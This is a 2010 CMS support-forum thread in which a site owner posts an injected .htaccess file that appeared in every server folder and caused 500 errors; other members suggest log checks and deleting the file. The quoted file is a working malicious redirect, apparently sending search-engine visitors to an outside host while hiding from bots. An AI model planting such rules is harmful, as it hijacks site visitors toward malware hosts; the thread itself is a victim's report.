Anonymous,

Please Login or Register
Download Nuke Evolution Xtreme today for a CMS you can enjoy using and sharing with your friends!
[ Download Now ]
Forum Index  ·  Search  ·  Usergroups  ·  Edit your profile  ·  Members  ·  Login, Check Messages
Arcade  ·  Ranks  ·  Staff  ·  Statistics  ·  Board Rules  ·  Forum FAQ  ·  Log in

Search for at
Evolution-Xtreme Advanced Search


+  
Latest Site News   Next 5 >>  
 Forum   Author   Replies   Last Post 
File Repository 1.0.0 Released Announcements! Lonestar 0 Tue Apr 26, 2016 6:44 am
Lonestar View latest post
Image Repository Released Announcements! Lonestar 1 Mon Oct 27, 2014 7:39 pm
Lonestar View latest post
So what happened to us? Announcements! SgtLegend 0 Tue May 06, 2014 12:32 am
SgtLegend View latest post
[PROGRESS] Nuke Evolution Xtreme 2.0.9e Announcements! SgtLegend 2 Sun May 27, 2012 6:25 pm
SgtLegend View latest post
European Cookie Law Announcements! SgtLegend 0 Sat May 26, 2012 7:33 am
SgtLegend View latest post
   
Recent Topics   Next 15 >>  
 Forum   Author   Replies   Last Post 
Evo staff looking for some volunteers. Community Announcements coRpSE 20 Thu Jul 02, 2015 9:19 am
Depresjon2 View latest post
Evo Xtreme 2.0.9D Updated for PHP 5.6 General Support coRpSE 121 Thu Mar 23, 2017 3:57 pm
casterdon View latest post
[ MOD ] - Honeypot V2.2 AntiBot Module Security coRpSE 106 Tue Nov 22, 2016 11:30 am
coRpSE View latest post
Possible new Admin area layout Comments and Suggestions Lonestar 18 Wed Sep 14, 2016 11:37 am
Blackou View latest post
jQuery update General Support Lonestar 2 Wed May 11, 2016 4:49 pm
Charles64 View latest post
Deutsche Sprachdatei - german language files German DT50R 7 Thu Jan 28, 2016 7:04 am
DT50R View latest post
[FIX] Correct Cookie Settings (Invalid Session Error) Quick fixes killigan 110 Fri Mar 20, 2015 1:06 pm
Macdaddy View latest post
login as admin strange error General Support Worfwarrior 8 Sun May 21, 2017 12:42 pm
Worfwarrior View latest post
Does Anyone Have a Media Player Mod? Modules goosse 0 Mon May 01, 2017 9:17 am
goosse View latest post
head and body help General Support hercountrybuck 8 Tue Apr 04, 2017 2:08 pm
Sp0rAdiC View latest post
babstats nuke evo PHP 5.6 Modules pd35 4 Mon Mar 27, 2017 5:45 pm
Ragonese View latest post
Looking for coRpSE? He is gone till May. General Chat coRpSE 4 Sun Mar 26, 2017 6:50 pm
coRpSE View latest post
Think I got hit with malware somehow General Support bobdude 10 Sun Mar 26, 2017 6:44 pm
coRpSE View latest post
error log Bugs Redcougarxr7 31 Tue Mar 21, 2017 8:46 pm
coRpSE View latest post
I seem to be locked out of my website Smile General Support storm 4 Sat Mar 11, 2017 12:29 pm
coRpSE View latest post

Internal 500 Server Error!!!
Goto page 1, 2, 3, 4, 5  Next
 
Post new topic    Reply to topic    printer-friendly view   Thank Post    Evolution-Xtreme Forum Index -> General Support
View previous topic :: View next topic  
Author Message
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 4:19 pm Post subject: No icon Internal 500 Server Error!!! Reply with quote

 Would  somebody  tell  me  how  it  was  possible  to  get  a  ".htaccess"  file  containing  this:
 
 
                                                 
Quote:                
#  exgocgkctswo
 RewriteEngine  On
 RewriteCond  %{REQUEST_METHOD}  Ã‚   ^GET$
 RewriteCond  %{HTTP_REFERER}  Ã‚   Ã‚   ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_REFERER}  Ã‚   Ã‚   !^.*(q\=cache\:).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|fudge\sYou|Google).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_USER_AGENT}  Ã‚ !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$  Ã‚   [NC]
 RewriteCond  %{HTTP_COOKIE}  Ã‚   Ã‚   Ã‚ !^.*xccgtswgokoe.*$
 RewriteCond  %{HTTPS}  Ã‚   Ã‚   Ã‚   Ã‚   Ã‚   Ã‚ ^off$
 RewriteRule  ^(.*)$  Ã‚   http://iamprotectedfrom.net/cgi-bin/r.cgi?p=10003&i=f6f2ce30&j=308&m=52f30393f6334253c7f00a15aef565e4&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  Ã‚ [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
 #  exgocgkctswo                

 
 into  every  folder  on  my  server  please?
 
 When  this  happened,  I  get  this  error...
 
 
                                                 
Quote:                
Internal  Server  Error
 The  server  encountered  an  internal  error  or  misconfiguration  and  was  unable  to  complete  your  request.
 
 Please  contact  the  server  administrator,
Please  login  to  see  this  email
Get  registered  or  Log  in
 and  inform  them  of  the  time  the  error  occurred,  and  anything  you  might  have  done  that  may  have  caused  the  error.
 
 More  information  about  this  error  may  be  available  in  the  server  error  log.
 
 Apache/1.3.33  Server  at  www.thetriggerhappypwner.com  Port  80                

 
 I  dont  suppose  I  was  hacked  was  I??   And  how  do  I  fix  it??
Back to top
View user's profile Send private message Visit poster's website
killigan
Xtreme Developer
Xtreme Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 08, 2008
Posts: 2442

Reputation: 35012.3
votes: 6
usa.png


Status: Offline
PostPosted: Tue Sep 21, 2010 4:28 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 That  is  interesting  Thomas.  Can  you  possibly  get  the  server  ftp  logs  and  raw  access  logs  and  pm  them  to  me  and  sgtlegend?
 
 In  the  mean  time,  can  you  also  list  any  extra  mods  or  hacks  you  have  installed  on  your  site  prior  to  this  happening  to  you?
Back to top
View user's profile Send private message Visit poster's website Visit member's Facebook: 154164544594519
SCT951




Joined: Aug 05, 2010
Posts: 179

Reputation: 22.4
votes: 1
blank.png


Status: Offline
PostPosted: Tue Sep 21, 2010 4:38 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 i  was  getting  this  error  alot  and  it  was  the  webhost  having  problems
Back to top
View user's profile Send private message
Sponsor
webstorm.jpg
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 4:47 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Sent  2  PM's,  one  to  Killigan  and  the  other  to  SgtLegend  as  requested  Killigan.
 
 They  are  for  the  last  2  days...
 
 Hope  they  help  you  figure  out  who,  what  or  how  this  occured.
 
 On  a  side  note,  there  is  a  copy  of  the  .htaccess  in  every  folder
Back to top
View user's profile Send private message Visit poster's website
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 26
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Tue Sep 21, 2010 5:02 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 What  happens  if  you  remove  the  .htaccess  file  as  it  runs  fine  on  my  localhost,  your  host  may  restrict  what  you  can  use  in  a  .htaccess  file  aswell
Back to top
View user's profile Send private message Visit poster's website
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 5:02 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 It  was  fine  till  about  30  mins  ago...
Back to top
View user's profile Send private message Visit poster's website
Sponsor
webstorm.jpg
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 26
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Tue Sep 21, 2010 5:04 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 That's  beside  the  point,  on  some  servers  a  .htaccess  file  won't  take  effect  for  a  given  period  of  time  if  running  on  an  older  version  of  Apache  which  if  you  look  you  are.  Make  a  backup  of  the  file  and  delete  it
Back to top
View user's profile Send private message Visit poster's website
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 5:20 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 As  I  have  said,  it  was  a  copy  of  the  file  in  every  single  folder  on  the  server,  thankfully,  I  have  managed  to  get  it  going  again,  however,  I  would  still  like  to  know  if  the  logs  suggest  any  reason  for  how  they  came  to  be.
Back to top
View user's profile Send private message Visit poster's website
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 26
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Tue Sep 21, 2010 5:38 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 The  server  logs  didn't  show  me  anything  to  say  something  else  caused  the  error
Back to top
View user's profile Send private message Visit poster's website
Sponsor
phpstorm.jpg
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 5:47 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Then  what  could  have  caused  it...
 
 I  am  sure  it  was  malware,  as  my  hosts  said...   Its  the  only  logical  explanation...  right?
Back to top
View user's profile Send private message Visit poster's website
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 6:01 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Also,  I  m  able  to  visit  the  forums,  but  "Visitors"  get  the  "message_die()  was  called  multiple  times.  This  isn't  supposed  to  happen.  Was  message_die()  used  in  page_tail.php?"  repeatedly...   suggestions?
Back to top
View user's profile Send private message Visit poster's website
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 26
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Tue Sep 21, 2010 7:39 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Open  your  FTP,  go  to  includes/cache/  and  delete  cache.php
 
 An  internal  server  error  can  only  ever  be  caused  by  a  .htaccess  file,  never  have  in  the  time  I've  used  a  .htaccess  file  have  i  gotten  an  internal  server  error  with  anything  else  but  that  file
Back to top
View user's profile Send private message Visit poster's website
Sponsor
phpstorm.jpg
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Tue Sep 21, 2010 7:59 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 What  does  the  code  I  found  inside  the  quote  in  the  first  post  do?
Back to top
View user's profile Send private message Visit poster's website
SgtLegend
Site Admin
Site Admin
Lead Developer
Lead Developer
DFG Developer
DFG Developer



Gender: Gender:Male
Joined: Oct 11, 2008
Age: 26
Posts: 5169
Location: Australia
Reputation: 616.1
votes: 27
australia.png


Status: Offline
Web Control Panel: WHM
PostPosted: Tue Sep 21, 2010 8:39 pm Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Where  did  you  get  it  from??
Back to top
View user's profile Send private message Visit poster's website
Thomas




Joined: May 29, 2009
Posts: 1246
Location: Norfolk
Reputation: -2000000000
votes: 6
uk.png


Status: Offline
PostPosted: Wed Sep 22, 2010 10:28 am Post subject: No icon Re: Internal 500 Server Error!!! Reply with quote

 Thats  my  point,  it  just  appeared  from  nowhere.   I  have  no  idea!
Back to top
View user's profile Send private message Visit poster's website
Sponsor
phpstorm.jpg
Display posts from previous:
Post new topic  Reply to topic   printer-friendly view   Thank Post Evolution-Xtreme Forum Index ->  General Support All times are UTC - 5 Hours
Goto page 1, 2, 3, 4, 5  Next
Page 1 of 5


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum

Related topics
 Topics   Replies   Author   Views   Last Post 
No new posts How do i add my info into Ts3 viewer block? 13 Evil_Blue 6787 Thu Nov 25, 2010 11:38 am
Red_Dawn View latest post
No new posts Umm, how do i get my colour back? 3 voldy 3187 Sat Nov 13, 2010 6:19 am
voldy View latest post
No new posts How do i install my own site logo? 2 Evil_Blue 2221 Thu Oct 07, 2010 3:17 pm
Evil_Blue View latest post
No new posts How do i install 2 .sql files into my database??? 1 Evil_Blue 2313 Sun Sep 26, 2010 9:47 am
SgtLegend View latest post
No new posts Still on php 4.4 how do I upgrade to 5.2? 2 {CBJ}jim 3133 Sun Sep 19, 2010 4:28 pm
killigan View latest post
 




Powered by phpBB © 2001, 2006 phpBB Group
EvoXtreme Theme by SgtLegend ©
Forums ©